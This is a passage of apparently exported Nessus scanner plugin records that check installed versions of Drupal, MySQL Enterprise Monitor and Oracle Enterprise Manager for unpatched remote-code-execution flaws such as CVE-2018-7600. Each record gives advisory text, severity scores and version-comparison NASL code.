value:\"2018/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:\"Drupal\", port:port, webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"7.0\", \"max_version\" : \"7.57\", \"fixed_version\" : \"7.58\" },\n { \"min_version\" : \"8.3.0\", \"max_version\" : \"8.3.8\", \"fixed_version\" : \"8.3.9\" },\n { \"min_version\" : \"8.4.0\", \"max_version\" : \"8.4.5\", \"fixed_version\" : \"8.4.6\" },\n { \"min_version\" : \"8.5.0\", \"max_version\" : \"8.5.0\", \"fixed_version\" : \"8.5.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:47:32", "description": "A remote code execution vulnerability has been found in Drupal, a fully-featured content management framework. 
For additional information, please refer to the upstream advisory at https://www.drupal.org/sa-core-2018-002", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4156.NASL", "href": "https://www.tenable.com/plugins/nessus/108698", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4156. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108698);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"DSA\", value:\"4156\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. 
For additional\ninformation, please refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4156\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the drupal7 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API 
Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"drupal7\", reference:\"7.32-1+deb8u11\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 
"2023-08-30T15:56:05", "description": "Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {}, "published": "2018-04-16T00:00:00", "type": "nessus", "title": "FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:drupal7", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "href": "https://www.tenable.com/plugins/nessus/109055", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109055);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before\n8.4.6, and 
8.5.x before 8.5.1 allows remote attackers to execute\narbitrary code because of an issue affecting multiple subsystems with\ndefault or common module configurations.\"\n );\n # https://vuxml.freebsd.org/freebsd/a9e466e8-4144-11e8-a292-00e04c1ea73d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8ffa708c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"drupal7<7.57\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:46:08", "description": "Jasper Mattsson found a remote code execution vulnerability in the Drupal content management system. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.\n\nFor further information please refer to the official upstream advisory at https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1325.NASL", "href": "https://www.tenable.com/plugins/nessus/108695", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1325-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108695);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. 
This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result\nin the site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/drupal7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected drupal7 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:05:11", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the following vulnerabilities in its subcomponents:\n\n 
- Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace. (CVE-2018-11776)\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n\n - Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. 
(CVE-2018-1258)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-07-24T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 3.4.x < 3.4.10 / 4.x < 4.0.7 / 8.x < 8.0.3 Multiple Vulnerabilities (Oct 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776", "CVE-2018-1258", "CVE-2018-8014"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_8_0_3.NASL", "href": "https://www.tenable.com/plugins/nessus/138901", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138901);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2018-1258\", \"CVE-2018-8014\", \"CVE-2018-11776\");\n script_bugtraq_id(\n 104203,\n 104222,\n 104530,\n 105125,\n 105538\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"MySQL Enterprise Monitor 3.4.x < 3.4.10 / 4.x < 4.0.7 / 8.x < 8.0.3 Multiple Vulnerabilities (Oct 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"MySQL Enterprise Monitor running on the remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the\nfollowing vulnerabilities in its subcomponents:\n\n - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when\n alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results\n are used with no namespace and in same time, its upper package have no or wildcard namespace and similar\n to results, same possibility when using url tag which doesn't 
have value and action set and in same time,\n its upper package have no or wildcard namespace. (CVE-2018-11776)\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It\n is expected that users of the CORS filter will have configured it appropriately for their environment\n rather than using it in the default configuration. Therefore, it is expected that most users will not be\n impacted by this issue. (CVE-2018-8014)\n\n - Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an\n authorization bypass when using method security. An unauthorized malicious user can gain unauthorized\n access to methods that should be restricted. (CVE-2018-1258)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2018.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.4.10, 4.0.7, 8.0.3 or later as referenced in the Oracle security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result 
Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'MySQL Enterprise Monitor';\nport = get_http_port(default:18443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:true);\n\nconstraints = [\n {'min_version' : '3.4', 'fixed_version' : '3.4.10'},\n {'min_version' : '4.0', 'fixed_version' : '4.0.7'},\n {'min_version' : '8.0', 'fixed_version' : '8.0.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:05:35", "description": "The 13.3.0.0, 13.4.0.0, and 12.1.0.5 versions of Enterprise Manager Base Platform installed on the remote host are affected by multiple vulnerabilities as referenced in the July 2020 CPU advisory.\n\n - Vulnerability in the Enterprise Manager Base 
Platform product of Oracle Enterprise Manager (component:\n Enterprise Manager Install (jackson-databind)).\n Supported versions that are affected are 13.3.0.0 and 13.4.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2020-9546)\n\n - Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component:\n Reporting Framework (Apache Struts 2)). Supported versions that are affected are 13.3.0.0 and 13.4.0.0.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2018-11776)\n\n - Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component:\n Application Service Level Mgmt (Apache Axis)). Supported versions that are affected are 12.1.0.5 and 13.3.0.0.\n Difficult to exploit vulnerability allows unauthenticated attacker with access to the physical communication segment attached to the hardware where the Enterprise Manager Base Platform executes to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. 
CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts).\n CVSS Vector:\n (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2019-0227)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-07-16T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control (Jul 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776", "CVE-2019-0227", "CVE-2019-12415", "CVE-2020-2982", "CVE-2020-9546"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": "ORACLE_ENTERPRISE_MANAGER_JUL_2020_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/138555", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138555);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2018-11776\",\n \"CVE-2019-0227\",\n \"CVE-2019-12415\",\n \"CVE-2020-2982\",\n \"CVE-2020-9546\"\n );\n script_bugtraq_id(105125, 107867);\n script_xref(name:\"IAVA\", value:\"2020-A-0326\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control (Jul 2020 CPU)\");\n\n 